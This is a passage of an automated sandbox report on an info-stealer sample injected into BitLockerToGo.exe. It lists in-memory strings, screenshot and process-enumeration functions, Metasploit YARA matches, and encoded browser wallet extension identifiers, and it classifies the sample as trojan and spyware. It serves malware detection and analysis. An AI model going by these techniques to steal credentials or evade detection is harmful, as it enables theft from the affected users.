Source: JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: https://ramensoftware.com/0
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ate
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: JEBFIIIE.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: JEBFIIIE.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_02769010

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Contains functionality to call native functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6C81ED10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6C85B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B8C0 rand_s,NtQueryVirtualMemory, 1_2_6C85B8C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6C85B910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6C7FF280
Detected potential crypto function
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7F35A0 1_2_6C7F35A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C806C80 1_2_6C806C80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8534A0 1_2_6C8534A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85C4A0 1_2_6C85C4A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8064C0 1_2_6C8064C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81D4D0 1_2_6C81D4D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C836CF0 1_2_6C836CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C86AC00 1_2_6C86AC00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C835C10 1_2_6C835C10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C842C10 1_2_6C842C10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FD4E0 1_2_6C7FD4E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C86542B 1_2_6C86542B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C805440 1_2_6C805440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C86545C 1_2_6C86545C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C830DD0 1_2_6C830DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8585F0 1_2_6C8585F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C80FD00 1_2_6C80FD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C820512 1_2_6C820512
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81ED10 1_2_6C81ED10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C85E680 1_2_6C85E680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FC670 1_2_6C7FC670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C815E90 1_2_6C815E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C854EA0 1_2_6C854EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8676E3 1_2_6C8676E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C80FEF0 1_2_6C80FEF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C845600 1_2_6C845600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FBEF0 1_2_6C7FBEF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C837E10 1_2_6C837E10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C859E30 1_2_6C859E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C814640 1_2_6C814640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C842E4E 1_2_6C842E4E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C819E50 1_2_6C819E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C833E50 1_2_6C833E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C866E63 1_2_6C866E63
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8477A0 1_2_6C8477A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C826FF0 1_2_6C826FF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C809F00 1_2_6C809F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C837710 1_2_6C837710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FDFE0 1_2_6C7FDFE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8260A0 1_2_6C8260A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8650C7 1_2_6C8650C7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81C0E0 1_2_6C81C0E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8358E0 1_2_6C8358E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C807810 1_2_6C807810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C83B820 1_2_6C83B820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C844820 1_2_6C844820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C818850 1_2_6C818850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81D850 1_2_6C81D850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C83F070 1_2_6C83F070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C835190 1_2_6C835190
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C852990 1_2_6C852990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82D9B0 1_2_6C82D9B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C81A940 1_2_6C81A940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FC9A0 1_2_6C7FC9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C80D960 1_2_6C80D960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C84B970 1_2_6C84B970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C86B170 1_2_6C86B170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C86BA90 1_2_6C86BA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C824AA0 1_2_6C824AA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C80CAB0 1_2_6C80CAB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C862AB0 1_2_6C862AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C838AC0 1_2_6C838AC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C811AF0 1_2_6C811AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C83E2F0 1_2_6C83E2F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7F22A0 1_2_6C7F22A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C839A60 1_2_6C839A60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7F5340 1_2_6C7F5340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8653C8 1_2_6C8653C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C83D320 1_2_6C83D320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C80C370 1_2_6C80C370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C7FF380 1_2_6C7FF380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C89ECC0 1_2_6C89ECC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8FECD0 1_2_6C8FECD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C966C00 1_2_6C966C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C97AC30 1_2_6C97AC30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8AAC60 1_2_6C8AAC60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C936D90 1_2_6C936D90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8A4DB0 1_2_6C8A4DB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6CA2CDC0 1_2_6CA2CDC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6CA28D20 1_2_6CA28D20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9CAD50 1_2_6C9CAD50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C96ED70 1_2_6C96ED70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C926E90 1_2_6C926E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C8AAEC0 1_2_6C8AAEC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C940EC0 1_2_6C940EC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C980E20 1_2_6C980E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C93EE70 1_2_6C93EE70
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 6C82CBE8 appears 134 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 6C8394D0 appears 90 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 027545C0 appears 317 times
Sample file is different than original file name gathered from version info
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Uses 32bit PE files
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Binary string: [0m[%s]%s %-44s address string too shortresource length too longunpacking Question.Classnon-empty decoder bufferencodeArray: nil elementstreamSafe was not resetmsgpack: unknown code %xflate: maxBits too largeBad 'interval' param: %s\Device\NamedPipe\cygwinrefining %#v to be > %#vrefining %#v to be < %#vNumberLowerBound for %#vNumberUpperBound for %#vLengthLowerBound for %#vLengthUpperBound for %#vchacha20: wrong key sizecould not resolve %q: %vThe string to transform.duplicate column name %qStdlen returned an errorinvalid field number: %dmismatching enum lengthsunknown extension degreeSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00installation_repositoriesbloom bytes too big %d %dresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributenumber of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesgoroutine profile cleanupchansend: spurious wakeupruntime
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/22@0/1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6C857030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_02769600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 1_2_02763720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9GM2419D.htm Jump to behavior
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
